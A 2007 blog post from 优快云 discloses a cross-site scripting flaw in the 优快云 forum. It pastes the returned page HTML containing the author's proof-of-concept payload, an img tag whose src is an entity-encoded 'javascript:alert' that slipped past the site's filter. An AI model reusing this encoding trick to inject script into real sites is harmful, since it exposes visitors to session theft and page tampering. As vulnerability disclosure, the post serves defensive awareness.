优快云论坛的跨站漏洞

于 2007-11-05 08:21:00 发布
阅读量1.8k 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: class table button javascript input function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chaircat/article/details/1866980

鉴于优快云的论坛出现严重跨站漏洞...

本人决定暂且不上...特此声明... 截图

返回的代码如下...

一个编码就过了...真让人心寒啊...

 <input type="button" value="举报" onclick="window.location.href='mai'+'lto:'+'myc'+'sdn@c'+'sdn.n'+'et?subject=优快云 Topic Report';return false">
 <input type="button" value="TOP" onclick="window.location.href='#top'"> </td></tr></table></td></tr></table>
<table class="item reply" csdnid="reply_45922064" cellspacing="1"><tr> <td class="info">
   <ul><li class="username"><target="_blank" href="http://hi.youkuaiyun.com/chaircat" onmouseover="javascript:showUserCard();"><img alt="" src="/u/ui/images/blank.gif" class="userstatus" /><var csdnid="Reply_Username">chaircat</var></a></li>
   <li class="nickname"><textarea csdnid="Reply_NickName" cols="" rows="" readonly="readonly">chaircat</textarea></li>
   <li class="grade">等 级:<img alt="" csdnid="Reply_UserRank" class="grade user5" src="/u/ui/images/blank.gif" /></li></ul></td>
   <td class="main"><table cellspacing="0" style="height: 100%;">
  <tr><td class="floor"><span>发表于:<var csdnid='Reply_Date'>2007-11-05 08:10:28</var></span><var csdnid="Reply_Layer">6</var>&nbsp;得分:<var csdnid='Reply_Point'>0</var></td></tr>
  <tr><td csdnid="Reply_Body" class="content">啊哈哈哈哈~~~XSS~~~~ <br /> 好了~~~优快云的兄弟们有的忙了~~~ <br /> 印象中DV过滤的还可以...还有Discuz... <br /> <img src="j&#97v&#97scrip&#116&#58alert(/跨站跨站I love you~~/)"  alt="" /></td></tr><tr><td csdnid="Reply_ModifyInfo"></td></tr><tr><td class="function">
  <!-- <span>预留的文字链广告位</span> //-->
chaircat
关注
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值